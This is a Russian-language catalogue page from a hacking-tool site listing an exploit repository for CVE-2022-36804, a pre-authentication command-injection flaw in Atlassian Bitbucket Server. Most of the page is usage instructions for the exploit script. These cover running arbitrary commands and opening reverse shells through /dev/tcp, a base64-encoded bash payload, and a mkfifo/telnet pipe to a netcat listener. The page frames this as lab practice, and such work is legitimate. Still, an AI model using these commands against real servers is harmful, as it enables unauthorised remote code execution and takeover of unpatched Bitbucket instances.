Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-36804 — Критическая уязвимость внедрения команд была обнаружена в нескольких конечных точках API Atlassian Bitbucket Server и Data Center. Эта уязвимость затрагивает все версии Bitbucket Server и Data Center, выпущенные до версий <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 и <8.3.1 | Kitploit
Инструменты/GitHubGitHub/walnutsecurity/cve-2022-36804
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеЛаборатории и Практика
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

Репозиторий
8433 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Критическая уязвимость внедрения команд была обнаружена в нескольких конечных точках API Atlassian Bitbucket Server и Data Center. Эта уязвимость затрагивает все версии Bitbucket Server и Data Center, выпущенные до версий <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 и <8.3.1

Поделиться

CVE-2022-36804: Pre-Auth RCE в Atlassian Bitbucket Server

Критическая уязвимость внедрения команд была обнаружена в нескольких конечных точках API сервера Atlassian Bitbucket и Data Center. Эта уязвимость затрагивает все версии Bitbucket Server и Data Center, выпущенные до версий <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 и <8.3.1.

Лаборатория CVE-2022-36804

Сборка Docker

root@kitploit:~
docker build -t bitbucket .

Запуск Docker

root@kitploit:~
docker run -it bitbucket

Использование cve-2022-36804.py

Проверка на удаленное выполнение кода (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Проверка RCE с пользовательской командой (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Проверка RCE с пользовательской командой, ключом проекта и именем репозитория

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Проверка для приватного репозитория

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7

Получение оболочки через netcat

Замените 172.17.0.3 на свой локальный IP-адрес

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

Запустите netcat слушатель с помощью:

root@kitploit:~
nc -lvp 4444

Преобразуйте /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 в base64 на случай ошибки выполнения полезной нагрузки.

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

Если вы все еще сталкиваетесь с ошибкой, выполните команду ниже:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

Рекомендуется установить уязвимую версию Bitbucket Server на машине Windows/Linux для практики. Так будет проще получить обратную оболочку по сравнению с образами Docker.

Дополнительную информацию можно найти здесь.

Ссылки

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
Скачать инструмент